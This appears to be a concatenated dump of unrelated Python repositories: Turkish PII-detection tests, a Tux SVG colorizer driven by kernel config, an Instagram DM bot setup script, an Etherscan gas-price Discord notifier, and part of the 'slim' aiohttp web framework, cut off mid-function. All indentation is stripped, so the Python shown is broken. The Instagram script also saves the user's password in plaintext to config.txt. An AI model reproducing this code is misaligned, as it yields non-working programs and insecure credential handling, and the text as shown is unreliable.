_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate4():
res = r.check(["06JK1234"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate5():
res = r.check(["81ABC75"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_date_of_birth():
res = r.check(["13.08.1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth2():
res = r.check(["13081987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth3():
res = r.check(["13/08/1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth4():
res = r.check(["13-08-1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth5():
res = r.check(["13 08 1987"])
_assert_match_first_item("Date of Birth", res)
def test_turkish_id_number():
res = r.check(["12345678902"])
assert "Turkish Identification Number" in str(res)
def test_turkish_id_number2():
res = r.check(["12345678900"])
assert "Turkish Identification Number" in str(res)
def test_turkish_tax_number():
res = r.check(["1234567890"])
assert "Turkish Tax Number" in str(res)
``` |
{
"source": "0xmre/tuxart",
"score": 3
} |
#### File: tuxart/sources/colorengine.py
```python
import struct
import configparser
# Construction of the RGB triplet
# base on the triplet (y,m,n)
def hexformat(configmenu):
red = configparser.countconfig('y',configmenu)%255
green = configparser.countconfig('m',configmenu)%255
blue = configparser.countconfig('n',configmenu)%255
res = '%02x%02x%02x' % (red,green,blue)
return res
# Add some modification on the hexa color
def modifycolor(rgbstr,int):
# Reconstructrion of RGB triplet
rgbtriplet = struct.unpack('BBB',bytes.fromhex(rgbstr))
red = rgbtriplet[0]
green = rgbtriplet[1]
blue = rgbtriplet[2]
# Modify red,green or blue depending on the bigger value
if red > green and red > blue:
if red <150: red = (red+100)
if (green+int)<201: green = (green+int)%200
if (blue+int)<231: blue = (blue+int)%230
elif green > blue:
if green<201: green = (green+55)
if (blue+int)<231: blue = (blue+int)%230
if (red+int)<151: red = (red+int)%150
else:
if blue<150: blue = (blue+150)%255
if (green+int)<201: green = (green+int)%200
if (red+int)<201: red = (red+int)%200
res = '%02x%02x%02x' % (abs(red),abs(green),abs(blue))
return res
# Reduce shadow of the hexa color
def reflectioncolor(rgbstr):
# Reconstructrion of RGB triplet
rgbtriplet = struct.unpack('BBB',bytes.fromhex(rgbstr))
red = rgbtriplet[0]
green = rgbtriplet[1]
blue = rgbtriplet[2]
if red>green and red>blue:
green= green + (red-green)*1/2
blue= blue + (red-blue)*1/2
elif green>blue:
blue=blue + (green-blue)*1/2
red= red + (green-red)*1/2
else:
red= red + (blue-red)*1/2
green= green + (blue-green)*1/2
res = '%02x%02x%02x' % (int(red),int(green),int(blue))
return res
# Increase shadow of the hexa color
def shadowcolor(rgbstr):
# Reconstructrion of RGB triplet
rgbtriplet = struct.unpack('BBB',bytes.fromhex(rgbstr))
red = rgbtriplet[0]
green = rgbtriplet[1]
blue = rgbtriplet[2]
if red>green and red>blue:
green= green - (red-green)*1/4
blue= blue - (red-blue)*1/4
elif green>blue:
blue= blue - (green-blue)*1/4
red= red - (green-red)*1/4
else:
red= red - (blue-red)*1/4
green= green - (blue-green)*1/4
res = '%02x%02x%02x' % (abs(int(red)),abs(int(green)),abs(int(blue)))
return res
```
#### File: tuxart/sources/main.py
```python
import string
import re
import collections
import tuxmodifier
import configparser
import sys
def main():
# If you choose to put your own .config file
if sys.argv[1]:
filename = sys.argv[1]
# Initialize tux_mod.svg
tuxmodifier.tuxinit()
# Fill dictionnary with configuration file's values
# key: name of the menuconfig, value: configuration with value(y,m,n)
configparser.filldic(filename)
# Painting time!
tuxmodifier.tuxcolorizer()
# Adding accessories
tuxmodifier.accessoryhandler()
if __name__=="__main__":
main()
```
#### File: tuxart/sources/tuxmodifier.py
```python
from xml.dom.minidom import parse
import xml.dom.minidom
import re
import xml.sax
import xml.dom
import colorengine
import configparser
import os
# Path to local files
path = os.path.dirname(os.path.realpath(__file__))
home = os.path.expanduser("~")
pathtomod = os.path.join(home,"Pictures/tux_mod.svg")
#
# Declaration of the different body part of the tux
#
bodypart = ['head','beak','left_eye','right_eye','body','torso','left_palm','right_palm']
# These arrays are fill with the different part of the tux to modify
head = ['skin_between_eyes', 'head_skin', 'forehead_reflection', 'right_eyebrows', 'left_eyebrows', ]
beak = ['smile', 'beak_shadow_on_eyes', 'beak_bottom_part', 'beak_bottom_part_reflection', 'beak_upper_part', 'beak_upper_part_reflection', 'right_nostril', 'left_nostril', 'beak_right_end']
left_eye = ['white_left_eye', 'left_pupil', 'left_pupil_reflection', 'left_eyelid']
right_eye = ['white_right_eye', 'right_pupil', 'right_pupil_reflection_1', 'right_pupil_reflection_2', 'right_eyelid']
body = ['skin', 'right_leg', 'left_leg', 'right_arm', 'right_arm_reflection', 'neck_reflection', 'skin_reflection', 'right_hand', 'right_hand_reflection_1', 'right_hand_reflection_2', 'left_arm', 'left_arm_reflection']
torso = ['belly', 'torso_shadow', 'shadow_under_beak', 'chest_left_shadow', 'chest_right_shadow', 'chest_middle_shadow', 'belly_shadow']
left_palm = ['left_palm', 'left_palm_shadow_1', 'left_palm_shadow_2', 'left_palm_reflection']
right_palm = ['right_palm_shadow_1', 'right_palm_shadow_2', 'right_palm_shadow_3', 'right_palm', 'right_palm_reflection', 'right_arm_shadow_1', 'right_arm_shadow_2']
# Accesory adder
def accessoryhandler():
# index in both lists links an item with a configuration
configs = ["CONFIG_FTRACE","CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE","CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE","CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE","CONFIG_ENCRYPTED_KEYS","CONFIG_USB_USBNET"]
items = ["tattoo1","helmet1","helmet2","helmet3","shield","cape"]
for config, item in zip(configs,items):
if configparser.isconfigenabled(config):
addaccessory(item)
# Color every part of the tux
def tuxcolorizer():
for key in bodypart:
if "left_eye" in key:
color1 = colorengine.hexformat('system')
color2 = colorengine.modifycolor(color1,-30)
color3 = colorengine.modifycolor(color1,10)
reflection = colorengine.reflectioncolor(color1)
for zone in left_eye:
if 'left_pupil' in zone:
modify(color2, zone)
elif 'reflection' in zone:
modify(reflection,zone)
elif 'white' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
elif "right_eye" in key:
color1 = colorengine.hexformat('system')
color2 = colorengine.modifycolor(color1,-30)
color3 = colorengine.modifycolor(color1,10)
reflection = colorengine.reflectioncolor(color1)
for zone in right_eye:
if 'right_pupil' in zone:
modify(color2, zone)
elif 'reflection' in zone:
modify(reflection,zone)
elif 'white' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
elif "beak" in key:
color1 = colorengine.hexformat('river')
color2 = colorengine.modifycolor(color1,-40)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in beak:
if 'nostril' in zone:
modify(color1,zone)
elif 'smile' in zone:
modify(colorengine.hexformat('Kernel'), zone)
elif 'shadow' in zone:
modify(shadow, zone)
else:
modify(color2, zone)
elif "head" in key:
color1 = colorengine.hexformat('sensors')
color2 = colorengine.modifycolor(color1,25)
color3 = colorengine.shadowcolor(color2)
reflection = colorengine.reflectioncolor(color2)
for zone in head:
if 'reflection' in zone:
modify(reflection, zone)
elif 'eyebrows' in zone:
modify(color1, zone)
elif 'eyes' in zone:
modify(color3, zone)
else:
modify(color2, zone)
elif "body" in key:
color1 = colorengine.hexformat('CPU')
color2 = colorengine.modifycolor(color1,20)
color3 = colorengine.modifycolor(color1,-10)
shadow = colorengine.shadowcolor(color1)
reflection = colorengine.reflectioncolor(color1)
for zone in body:
if 'reflection' in zone:
modify(reflection, zone)
if 'leg' in zone:
modify(color2, zone)
elif 'skin' in zone:
modify(color3, zone)
else:
modify(color1, zone)
elif "torso" in key:
color1 = colorengine.hexformat('Net')
color2 = colorengine.modifycolor(color1,40)
shadow = colorengine.shadowcolor(color1)
for zone in torso:
if 'shadow' in zone:
modify(shadow, zone)
elif 'belly' in zone:
modify(color2, zone)
else:
modify(color1, zone)
elif "left_palm" in key:
color1 = colorengine.hexformat('USB')
color2 = colorengine.modifycolor(color1,-50)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in left_palm:
if 'reflection' in zone:
modify(reflection, zone)
elif 'shadow_1' in zone:
modify(shadow, zone)
elif 'shadow_2' in zone:
modify(color2, zone)
else:
modify(color1, zone)
elif "right_palm" in key:
color1 = colorengine.hexformat('support')
color2 = colorengine.modifycolor(color1,20)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in right_palm:
if 'reflection' in zone:
modify(reflection, zone)
elif 'shadow_1' in zone:
modify(shadow, zone)
elif 'shadow' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
# Add argument item to tux_mod.svg
def addaccessory(item):
"""
takes the name of an item and add it to the specified file
"""
global pathtomod
global path
DOMTree = parse(pathtomod)
f=open(pathtomod, "w")
svg = DOMTree.documentElement
newElement = DOMTree.createElement("g")
newElement.setAttribute("id","mark")
svg.appendChild(newElement);
f.write(DOMTree.toprettyxml())
f.close()
f=open(pathtomod, "r")
regex="<g id=\"mark\"/>"
regex=re.escape(regex)
matches=re.split(regex, f.read(), 1)
tuxSvg1=matches[0]
tuxSvg2=matches[1]
f.close()
pathtoitem = os.path.join(path, "sprays/")
f=open(pathtoitem+item+".svg", "r")
regex="id=\""+item+"\""
regex=re.escape(regex)
tuxSvg1=tuxSvg1+"<g\n\t\t\t"+regex
matches=re.split(regex, f.read(), 1)
match=matches[1]
regex="<g id=\"mark\"/>"
regex=re.escape(regex)
matches=re.split(regex, match, 1)
f.close()
f=open(pathtomod, "w")
f.write(tuxSvg1+matches[0]+tuxSvg2)
f.close()
# Apply color in hexadecimal to bodypart
def modify(hexacolor, bodypart):
"""
modify the bodypart with the color given
"""
global pathtomod
DOMTree = xml.dom.minidom.parse(pathtomod)
f=open(pathtomod, "w")
svg = DOMTree.documentElement
paths = svg.getElementsByTagName("path")
for path in paths:
if path.getAttribute("id")==bodypart:
if path.hasAttribute("style"):
style = path.getAttribute("style")
regex="fill:"
matches=re.split(regex, style, 1)
newStyle=matches[0]+"fill:"
regex=";"
style=matches[1]
matches=re.split(regex, style, 1)
newStyle=newStyle+"#"+hexacolor+";"+matches[1]
path.setAttribute("style", newStyle)
else:
print(bodypart+" : <style> not found")
f.write(DOMTree.toprettyxml())
f.close()
# Initialize tux_mod.svg
def tuxinit():
"""
go back to the original Tux
"""
global path
global pathtomod
pathtotux = os.path.join(path, "sprays/original_tux.svg")
tux = open(pathtotux).read()
f=open(pathtomod, "w+")
f.write(tux)
f.close()
``` |
{
"source": "0xN1nja/Instagram-DM-Bot",
"score": 3
} |
#### File: 0xN1nja/Instagram-DM-Bot/config.py
```python
import getpass
import re
import os
# Constants
WELCOME_MESSAGE = '''
###
# # # #### ##### ## #### ##### ## # #
# ## # # # # # # # # # # # ## ##
# # # # #### # # # # # # # # # ## #
# # # # # # ###### # ### ##### ###### # #
# # ## # # # # # # # # # # # # #
### # # #### # # # #### # # # # # #
##### # #
# # ## ##
# # # ## #
# # # #
# # # #
##### # #
##### #### #####
# # # # #
##### # # #
# # # # #
# # # # #
##### #### #
'''
print(WELCOME_MESSAGE)
def validate_schedule_input(scheduling_time: str):
if not re.match(r"\d\d:\d\d", scheduling_time):
return False
else:
return True
def validate_webhook_url(webhook_url: str):
if webhook_url.startswith("https://") or webhook_url.startswith("http://"):
return True
else:
return False
username = input("Enter Your Instagram Username : ").lower()
if len(username) > 0:
USERNAME = username
else:
print("Invalid Username!")
exit()
password = getpass.getpass("Enter Your Instagram Password : ")
if len(password) > 0:
PASSWORD = password
else:
print("Invalid Password!")
exit()
t_username = input("Enter Target's Username : ").lower()
if len(t_username) > 0:
TARGET_USERNAME = t_username
else:
print("Enter Target's Username Correctly!")
exit()
schedule_message = input("Do You Want To Schedule Message (Y/N) (Case Sensitive) : ").lower()
if schedule_message == "y":
s_time = input("Enter Sending Time (24hr) Eg : 00:00 : ")
if validate_schedule_input(s_time):
SENDING_TIME = s_time
SCHEDULE_MESSAGE = True
DONT_SCHEDULE = False
else:
print("Invalid Time Format.")
exit()
elif schedule_message == "n":
SENDING_TIME = None
DONT_SCHEDULE = True
SCHEDULE_MESSAGE = False
else:
print("Please Enter Value Correctly!")
exit()
shutdown_pc = input("Do You Want To Shutdown PC After Sending Message (Y/N) (Case Sensitive) : ").lower()
if shutdown_pc == "y":
SHUTDOWN = True
elif shutdown_pc == "n":
SHUTDOWN = False
else:
print("Please Enter Value Correctly!")
exit()
chromedriver_path = input(
"Enter Chrome Driver Path (Download From https://chromedriver.chromium.org/ According To Your Chrome Version) : ")
if "chromedriver" in chromedriver_path and os.path.isfile(chromedriver_path):
CHROME_DRIVER_PATH = chromedriver_path
else:
print("Invalid Chrome Driver Path!")
exit()
message = input("Type Message To Send : ")
if len(message) > 0:
MESSAGE = message
else:
print("Please Enter Message Correctly!")
exit()
webhook_url = input("Enter Discord Webhook URL : ")
if len(webhook_url) > 0 and validate_webhook_url(webhook_url):
WEBHOOK_URL = webhook_url
else:
print("Invalid Webhook URL!")
exit()
with open("config.txt", "w") as f:
f.write(str(USERNAME) + "\n")
f.write(str(PASSWORD) + "\n")
f.write(str(TARGET_USERNAME) + "\n")
f.write(str(MESSAGE) + "\n")
f.write(str(SHUTDOWN) + "\n")
f.write(str(SENDING_TIME) + "\n")
f.write(str(CHROME_DRIVER_PATH) + "\n")
f.write(str(DONT_SCHEDULE) + "\n")
f.write(str(SCHEDULE_MESSAGE) + "\n")
f.write(str(WEBHOOK_URL) + "\n")
print("Done! Now Run bot.py")
``` |
{
"source": "0xNev/Gas-Notifier",
"score": 3
} |
#### File: 0xNev/Gas-Notifier/main.py
```python
import requests,time
from discord_webhook import DiscordWebhook, DiscordEmbed
print('Monitoring has started...')
targetprice = 40
EtherscanApiKey = ''
webhookurl = ''
def ping(gas):
webhook = DiscordWebhook(url=webhookurl)
embed = DiscordEmbed(title=':fuelpump: GAS LOW :fuelpump:', description=f'Gas price currently at {gas} ', color='03b2f8')
webhook.add_embed(embed)
response = webhook.execute()
print('Webhook Sent')
def getgas():
global gas
r = requests.get(f'https://api.etherscan.io/api?module=gastracker&action=gasoracle&apikey={EtherscanApiKey}')
gas = r.json()['result']['ProposeGasPrice']
print(f'Monitoring[{gas}]')
time.sleep(.9)
if __name__ == "__main__":
while True:
getgas()
gas_ = int(gas)
if gas_ <= targetprice:
print(f'Gas is at or below desired price [{str(targetprice)}]')
ping(gas_)
time.sleep(10)
else:
pass
``` |
{
"source": "0xNone/slim",
"score": 3
} |
#### File: slim/base/sqlfuncs.py
```python
import logging
from abc import abstractmethod
from enum import Enum
from typing import Tuple, Dict, Iterable, Union, List
from .sqlquery import SQLQueryInfo, SQLValuesToWrite, DataRecord
logger = logging.getLogger(__name__)
class AbstractSQLFunctions:
def __init__(self, view_cls):
self.vcls = view_cls
@abstractmethod
async def select_one(self, info: SQLQueryInfo) -> DataRecord:
"""
Select one record from database
:param info:
:return: record
"""
raise NotImplementedError()
@abstractmethod
async def select_page(self, info: SQLQueryInfo, size=1, page=1) -> Tuple[Tuple[DataRecord, ...], int]:
"""
Select from database
:param info:
:param size: -1 means infinite
:param page:
:param need_count: if True, get count as second return value, otherwise -1
:return: records. count
"""
raise NotImplementedError()
@abstractmethod
async def update(self, records: Iterable[DataRecord], values: SQLValuesToWrite, returning=False) -> Union[int, Iterable[DataRecord]]:
"""
:param records:
:param values:
:param returning:
:return: return count if returning is False, otherwise records
"""
raise NotImplementedError()
@abstractmethod
async def insert(self, values_lst: Iterable[SQLValuesToWrite], returning=False) -> Union[int, List[DataRecord]]:
"""
:param values_lst:
:param returning:
:return: return count if returning is False, otherwise records
"""
raise NotImplementedError()
@abstractmethod
async def delete(self, records: Iterable[DataRecord]) -> int:
raise NotImplementedError()
```
#### File: slim/base/view.py
```python
import asyncio
import logging
import time
from abc import abstractmethod
from ipaddress import ip_address, IPv4Address, IPv6Address
from types import FunctionType
from typing import Tuple, Union, Dict, Iterable, Type, List, Set, Any, Optional
from unittest import mock
from aiohttp import web, hdrs
from aiohttp.web_request import BaseRequest
from multidict import CIMultiDictProxy
from slim.base.user import BaseUserViewMixin
from .sqlquery import SQLQueryInfo, SQL_TYPE, SQLForeignKey, SQLValuesToWrite, ALL_COLUMNS, PRIMARY_KEY, SQL_OP
from .app import Application
from .helper import create_signed_value, decode_signed_value
from .permission import Permissions, Ability, BaseUser, A, DataRecord
from .sqlfuncs import AbstractSQLFunctions
from ..retcode import RETCODE
from ..utils import pagination_calc, MetaClassForInit, async_call, get_ioloop, sync_call
from ..utils.json_ex import json_ex_dumps
from ..exception import RecordNotFound, SyntaxException, InvalidParams, SQLOperatorInvalid, ColumnIsNotForeignKey, \
ColumnNotFound, InvalidRole, PermissionDenied, FinishQuitException, SlimException, TableNotFound, \
ResourceException, NotNullConstraintFailed, AlreadyExists, InvalidPostData, NoUserViewMixinException
logger = logging.getLogger(__name__)
class BaseView(metaclass=MetaClassForInit):
"""
应在 cls_init 时完成全部接口的扫描与wrap函数创建
并在wrapper函数中进行实例化,传入 request 对象
"""
_interface = {}
_no_route = False
# permission: Permissions # 3.6
@classmethod
def use(cls, name, method: [str, Set, List], url=None):
""" interface helper function"""
if not isinstance(method, (str, list, set, tuple)):
raise BaseException('Invalid type of method: %s' % type(method).__name__)
if isinstance(method, str):
method = {method}
# TODO: check methods available
cls._interface[name] = [{'method': method, 'url': url}]
@classmethod
def use_lst(cls, name):
cls._interface[name] = [
{'method': {'GET'}, 'url': '%s/{page}' % name},
{'method': {'GET'}, 'url': '%s/{page}/{size}' % name},
]
@classmethod
def discard(cls, name):
""" interface helper function"""
cls._interface.pop(name, None)
@classmethod
def interface(cls):
pass
@classmethod
def cls_init(cls):
cls._interface = {}
cls.interface()
for k, v in vars(cls).items():
if isinstance(v, FunctionType):
if getattr(v, '_interface', None):
cls.use(k, *v._interface)
@property
def permission(self) -> Permissions:
return self.app.permission
def __init__(self, app: Application, aiohttp_request: BaseRequest = None):
self.app = app
if aiohttp_request is None:
self._request = mock.Mock()
else:
self._request = aiohttp_request
self.ret_val = None
self.response = None
self.session = None
self._cookie_set = None
self._params_cache = None
self._post_data_cache = None
self._post_json_cache = None
self._current_user = None
self._current_user_roles = None
self.temp_storage = {}
@property
def is_finished(self):
return self.response is not None
async def _prepare(self):
# 如果获取用户是一个异步函数,那么提前将其加载
if self.can_get_user:
func = getattr(self, 'get_current_user', None)
if func:
if asyncio.iscoroutinefunction(func):
self._current_user = await func()
session_cls = self.app.options.session_cls
self.session = await session_cls.get_session(self)
async def prepare(self):
pass
async def _on_finish(self):
if self.session:
await self.session.save()
async def on_finish(self):
pass
async def get_x_forwarded_for(self) -> List[Union[IPv4Address, IPv6Address]]:
lst = self._request.headers.getall(hdrs.X_FORWARDED_FOR, [])
if not lst: return []
lst = map(str.strip, lst[0].split(','))
return [ip_address(x) for x in lst if x]
async def get_ip(self) -> Union[IPv4Address, IPv6Address]:
"""
get ip address of client
:return:
"""
xff = await self.get_x_forwarded_for()
if xff: return xff[0]
ip_addr = self._request.transport.get_extra_info('peername')[0]
return ip_address(ip_addr)
@property
def can_get_user(self):
return isinstance(self, BaseUserViewMixin)
@property
def current_user(self) -> BaseUser:
if not self.can_get_user:
raise NoUserViewMixinException("Current View should inherited from `BaseUserViewMixin` or it's subclasses")
if not self._current_user:
func = getattr(self, 'get_current_user', None)
if func:
# 只加载非异步函数
if not asyncio.iscoroutinefunction(func):
self._current_user = func()
else:
self._current_user = None
return self._current_user
@property
def roles(self) -> Set:
if not self.can_get_user:
raise NoUserViewMixinException("Current View should inherited from `BaseUserViewMixin` or it's subclasses")
if self._current_user_roles is not None:
return self._current_user_roles
else:
u = self.current_user
self._current_user_roles = {None} if u is None else set(u.roles)
return self._current_user_roles
@property
def retcode(self):
if self.is_finished:
return self.ret_val['code']
def _finish_end(self):
for i in self._cookie_set or ():
if i[0] == 'set':
self.response.set_cookie(i[1], i[2], **i[3])
else:
self.response.del_cookie(i[1])
def finish(self, code, data=NotImplemented):
"""
Set response as {'code': xxx, 'data': xxx}
:param code:
:param data:
:return:
"""
if data is NotImplemented:
data = RETCODE.txt_cn.get(code, None)
self.ret_val = {'code': code, 'data': data} # for access in inhreads method
self.response = web.json_response(self.ret_val, dumps=json_ex_dumps)
logger.debug('finish: %s' % self.ret_val)
self._finish_end()
def finish_raw(self, body: bytes, status: int = 200, content_type: Optional[str] = None):
"""
Set raw response
:param body:
:param status:
:param content_type:
:return:
"""
self.ret_val = body
self.response = web.Response(body=body, status=status, content_type=content_type)
logger.debug('finish: raw body(%d bytes)' % len(body))
self._finish_end()
def del_cookie(self, key):
if self._cookie_set is None:
self._cookie_set = []
self._cookie_set.append(('del', key))
@property
def params(self) -> dict:
if self._params_cache is None:
self._params_cache = dict(self._request.query)
return self._params_cache
async def _post_json(self) -> dict:
# post body: raw(text) json
if self._post_json_cache is None:
self._post_json_cache = dict(await self._request.json())
return self._post_json_cache
async def post_data(self) -> dict:
if self._post_data_cache is not None:
return self._post_data_cache
if self._request.content_type == 'application/json':
# post body: raw(text) json
self._post_data_cache = dict(await self._request.json())
else:
# post body: form data
self._post_data_cache = dict(await self._request.post())
logger.debug('raw post data: %s', self._post_data_cache)
return self._post_data_cache
def set_cookie(self, key, value, *, path='/', expires=None, domain=None, max_age=None, secure=None,
httponly=None, version=None):
if self._cookie_set is None:
self._cookie_set = []
kwargs = {'path': path, 'expires': expires, 'domain': domain, 'max_age': max_age, 'secure': secure,
'httponly': httponly, 'version': version}
self._cookie_set.append(('set', key, value, kwargs))
def get_cookie(self, name, default=None):
if self._request.cookies is not None and name in self._request.cookies:
return self._request.cookies.get(name, default)
return default
def set_secure_cookie(self, name, value: bytes, *, httponly=True, max_age=30):
# 一般来说是 UTC
# https://stackoverflow.com/questions/16554887/does-pythons-time-time-return-a-timestamp-in-utc
timestamp = int(time.time())
# version, utctime, name, value
# assert isinatance(value, (str, list, tuple, bytes, int))
to_sign = [1, timestamp, name, value]
secret = self.app.options.cookies_secret
self.set_cookie(name, create_signed_value(secret, to_sign), max_age=max_age, httponly=httponly)
def get_secure_cookie(self, name, default=None, max_age_days=31):
secret = self.app.options.cookies_secret
value = self.get_cookie(name)
if value:
data = decode_signed_value(secret, value)
# TODO: max_age_days 过期计算
if data and data[2] == name:
return data[3]
return default
@property
def headers(self) -> CIMultiDictProxy:
return self._request.headers
@property
def route_info(self):
"""
info matched by router
:return:
"""
return self._request.match_info
@classmethod
def _ready(cls):
""" private version of cls.ready() """
sync_call(cls.ready)
@classmethod
def ready(cls):
"""
All modules loaded, and ready to serve.
Emitted after register routes and before loop start
:return:
"""
pass
class ViewOptions:
def __init__(self, *, list_page_size=20, list_accept_size_from_client=False, list_page_size_client_limit=None,
permission: Permissions = None):
self.list_page_size = list_page_size
self.list_accept_size_from_client = list_accept_size_from_client
self.list_page_size_client_limit = list_page_size_client_limit
if permission:
self.permission = permission
def assign(self, obj: Type["AbstractSQLView"]):
obj.LIST_PAGE_SIZE = self.list_page_size
obj.LIST_PAGE_SIZE_CLIENT_LIMIT = self.list_page_size_client_limit
obj.LIST_ACCEPT_SIZE_FROM_CLIENT = self.list_page_size_client_limit
if isinstance(self.permission, Permissions):
obj.permission = self.permission
class ErrorCatchContext:
def __init__(self, view: "AbstractSQLView"):
self.view = view
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val: Exception, exc_tb):
# FinishQuitException
if isinstance(exc_val, FinishQuitException):
return True # Finished, do nothing
# SyntaxException
elif isinstance(exc_val, SyntaxException):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
# ParamsException
elif isinstance(exc_val, SQLOperatorInvalid):
self.view.finish(RETCODE.INVALID_PARAMS, "Invalid operator for select condition: %r" % exc_val.args[0])
elif isinstance(exc_val, ColumnIsNotForeignKey):
self.view.finish(RETCODE.INVALID_PARAMS, "This column is not a foreign key: %r" % exc_val.args[0])
elif isinstance(exc_val, InvalidParams):
if len(exc_val.args):
self.view.finish(RETCODE.INVALID_PARAMS, exc_val.args[0])
else:
self.view.finish(RETCODE.INVALID_PARAMS)
elif isinstance(exc_val, InvalidPostData):
if len(exc_val.args) and exc_val.args[0].startswith('Column bad value'):
self.view.finish(RETCODE.INVALID_POSTDATA, exc_val.args[0])
else:
self.view.finish(RETCODE.INVALID_POSTDATA)
# ResourceException
elif isinstance(exc_val, TableNotFound):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
elif isinstance(exc_val, ColumnNotFound):
self.view.finish(RETCODE.FAILED, "Column not found: %r" % exc_val.args[0])
elif isinstance(exc_val, RecordNotFound):
if len(exc_val.args) > 0:
self.view.finish(RETCODE.NOT_FOUND, 'Nothing found from table %r' % exc_val.args[0])
else:
self.view.finish(RETCODE.NOT_FOUND, 'Nothing found from table %r' % self.view.table_name)
elif isinstance(exc_val, NotNullConstraintFailed):
self.view.finish(RETCODE.INVALID_POSTDATA, 'NOT NULL constraint failed')
elif isinstance(exc_val, AlreadyExists):
self.view.finish(RETCODE.ALREADY_EXISTS)
elif isinstance(exc_val, ResourceException):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
# PermissionException
elif isinstance(exc_val, InvalidRole):
self.view.finish(RETCODE.INVALID_ROLE, "Invalid role: %r" % exc_val.args[0])
elif isinstance(exc_val, PermissionDenied):
if len(exc_val.args):
self.view.finish(RETCODE.PERMISSION_DENIED, exc_val.args[0])
else:
self.view.finish(RETCODE.PERMISSION_DENIED)
# others
elif isinstance(exc_val, SlimException):
self.view.finish(RETCODE.FAILED)
else:
return # 异常会传递出去
return True
class AbstractSQLView(BaseView):
_sql_cls = AbstractSQLFunctions
is_base_class = True # skip cls_init check
options_cls = ViewOptions
LIST_PAGE_SIZE = 20 # list 单次取出的默认大小,若为-1取出所有
LIST_PAGE_SIZE_CLIENT_LIMIT = None # None 为与LIST_PAGE_SIZE相同,-1 为无限
LIST_ACCEPT_SIZE_FROM_CLIENT = False
table_name = None
primary_key = None
fields = {}
foreign_keys = {}
foreign_keys_table_alias = {}
# table_name: str = None
# primary_key: str = None
# fields: Dict[str, SQL_TYPE] = {}
# foreign_keys: Dict[str, List[SQLForeignKey]] = {}
# foreign_keys_table_alias: Dict[str, str] = {} # hide real table name
@classmethod
def _is_skip_check(cls):
skip_check = False
if 'is_base_class' in cls.__dict__:
skip_check = getattr(cls, 'is_base_class')
return skip_check
@classmethod
def interface(cls):
# super().interface() # 3.5, super(): empty __class__ cell
cls.use('get', 'GET')
cls.use_lst('list')
cls.use('update', 'POST')
cls.use('new', 'POST')
cls.use('delete', 'POST')
# deprecated
cls.use('set', 'POST')
@classmethod
def add_soft_foreign_key(cls, column, table_name, alias=None):
"""
the column stores foreign table's primary key but isn't a foreign key (to avoid constraint)
warning: if the table not exists, will crash when query with loadfk
:param column: table's column
:param table_name: foreign table name
:param alias: table name's alias. Default is as same as table name.
:return: True, None
"""
if column in cls.fields:
table = SQLForeignKey(table_name, column, cls.fields[column], True)
if alias:
if alias in cls.foreign_keys_table_alias:
logger.warning("This alias of table is already exists, overwriting: %s.%s to %s" %
(cls.__name__, column, table_name))
cls.foreign_keys_table_alias[alias] = table
if column not in cls.foreign_keys:
cls.foreign_keys[column] = [table]
else:
if not alias:
logger.warning("The soft foreign key will not work, an alias required: %s.%s to %r" %
(cls.__name__, column, table_name))
cls.foreign_keys[column].append(table)
return True
@classmethod
def _check_view_options(cls):
options = getattr(cls, 'options', None)
if options and isinstance(options, ViewOptions):
options.assign(cls)
@classmethod
def cls_init(cls, check_options=True):
if check_options:
cls._check_view_options()
# because of BaseView.cls_init is a bound method (@classmethod)
# so we can only route BaseView._interface, not cls._interface defined by user
BaseView.cls_init.__func__(cls)
# super().cls_init() # fixed in 3.6
assert isinstance(cls.LIST_PAGE_SIZE, int), '%s.LIST_PAGE_SIZE must be int' % cls.__name__
assert cls.LIST_PAGE_SIZE == -1 or cls.LIST_PAGE_SIZE > 0, \
'%s.LIST_PAGE_SIZE must be -1 or more than 0' % cls.__name__
assert cls.LIST_PAGE_SIZE_CLIENT_LIMIT is None or isinstance(cls.LIST_PAGE_SIZE_CLIENT_LIMIT, int), \
'%s.LIST_PAGE_SIZE_CLIENT_LIMIT must be None or int' % cls.__name__
if isinstance(cls.LIST_PAGE_SIZE_CLIENT_LIMIT, int):
assert cls.LIST_PAGE_SIZE_CLIENT_LIMIT == -1 or cls.LIST_PAGE_SIZE_CLIENT_LIMIT > 0, \
'%s.LIST_PAGE_SIZE must be None or -1 or more than 0' % cls.__name__
async def func():
await cls._fetch_fields(cls)
if not cls._is_skip_check():
assert cls.table_name
assert cls.fields
# assert cls.primary_key
# assert cls.foreign_keys
get_ioloop().run_until_complete(func())
def _load_role(self, role):
user = self.current_user if self.can_get_user else None
self.ability = self.permission.request_role(user, role)
return self.ability
@property
def current_request_role(self) -> [int, str]:
"""
Current role requested by client.
:return:
"""
role_val = self.headers.get('Role')
return int(role_val) if role_val and role_val.isdigit() else role_val
async def _prepare(self):
await super()._prepare()
# _sql 里使用了 self.err 存放数据
# 那么可以推测在并发中,cls._sql.err 会被多方共用导致出错
self._sql = self._sql_cls(self.__class__)
if not self._load_role(self.current_request_role):
logger.debug("load role %r failed, please check permission settings of View %r"
" (mapping to table %r)." %
(self.current_request_role, type(self).__name__, type(self).table_name))
raise InvalidRole(self.current_request_role)
async def load_fk(self, info: SQLQueryInfo, records: Iterable[DataRecord]) -> Union[List, Iterable]:
"""
:param info:
:param records: the data got from database and filtered from permission
:return:
"""
# if not items, items is probably [], so return itself.
# if not items: return items
# 1. get tables' instances
# table_map = {}
# for column in info['loadfk'].keys():
# tbl_name = self.foreign_keys[column][0]
